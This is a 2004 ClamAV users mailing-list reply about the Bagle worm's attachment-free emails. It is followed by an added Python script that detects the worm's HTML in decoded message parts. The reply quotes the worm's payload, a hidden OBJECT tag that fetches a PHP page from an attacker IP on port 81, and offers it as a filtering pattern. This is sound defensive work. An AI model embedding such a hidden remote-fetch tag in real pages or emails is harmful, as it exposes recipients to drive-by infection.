> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:clamav-users-
> [EMAIL PROTECTED] On Behalf Of jef moskot
> Sent: 18 March 2004 12:52
> To: [EMAIL PROTECTED]
> Subject: [Clamav-users] attachment-free worms
>
> Based on what this article says, it looks like there will soon be problems
> with my config: http://www.sophos.com/virusinfo/articles/bagletwist.html
>
> I wasn't able to get my version of amavis properly patched to submit the
> body of the message to clam (or at least as far as I can tell, that's not
> what's happening).
>

A signature to detect these e-mails was added through daily.cvd version 194, so I guess you must patch your amavis setup so ClamAV is allowed to scan the raw e-mail.

These e-mails contain nothing but an HTML exploit. If you're able to filter HTML somewhere else this is what you should go after:

---snip---
<font face="System">
<OBJECT STYLE="display:none" DATA="http://IP_ADDR:81/NUMBERS.php">
</OBJECT>
---snip---

IP_ADDR = an IP address
NUMBERS = variable length of numbers from 0-9
Line breaks = CR/LF (hex: 0x0D 0x0A)

And there will probably also be some HTML tags around this.

Last resort would be to prevent users at your network from reaching TCP port 81.

Best regards,
Diego d'Ambra
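
The HTML filtering suggested in the reply above, sketched as an added example (not code from the original post, ClamAV or amavis). It goes slightly beyond the post by decoding each text part first, because a quoted-printable copy of the same tag (`DATA=3D"..."`) would not match a pattern applied to the raw message. The function name, regexes and sample messages are constructed for illustration; 192.0.2.10 is a documentation address.

```python
import re
from email import message_from_bytes, policy

# Shape given in the post: <OBJECT ... DATA="http://IP_ADDR:81/NUMBERS.php">
OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.IGNORECASE)
DATA_URL = re.compile(
    r"""\bdata\s*=\s*["']?http://(\d{1,3}(?:\.\d{1,3}){3}):81/\d+\.php\b""",
    re.IGNORECASE,
)

def _is_ipv4(host: str) -> bool:
    return all(int(octet) <= 255 for octet in host.split("."))

def find_port81_objects(raw: bytes) -> list[str]:
    """Return the IP of every OBJECT tag whose DATA matches the post's pattern."""
    msg = message_from_bytes(raw, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue  # skip multipart containers and binary attachments
        try:
            body = part.get_content()  # undoes base64 / quoted-printable
        except LookupError:  # unknown charset label
            body = part.get_payload(decode=True).decode("latin-1")
        for tag in OBJECT_TAG.findall(body):
            m = DATA_URL.search(tag)
            if m and _is_ipv4(m.group(1)):
                hits.append(m.group(1))
    return hits

# Constructed samples; 192.0.2.10 is a documentation (TEST-NET-1) address.
HEAD = b"Subject: sample\r\nMIME-Version: 1.0\r\nContent-Type: text/html\r\n"
PLAIN = HEAD + (b'\r\n<font face="System">\r\n<OBJECT STYLE="display:none" '
                b'DATA="http://192.0.2.10:81/0123456.php">\r\n</OBJECT>\r\n')
QP = HEAD + (b"Content-Transfer-Encoding: quoted-printable\r\n\r\n"
             b'<OBJECT STYLE=3D"display:none" DATA=3D"http://192.0.2.10:81/=\r\n'
             b'0123456.php">\r\n</OBJECT>\r\n')
BENIGN = HEAD + b'\r\n<object data="http://example.com/clip.swf"></object>\r\n'

if __name__ == "__main__":
    for name, raw in (("plain", PLAIN), ("qp", QP), ("benign", BENIGN)):
        print(name, find_port81_objects(raw))
```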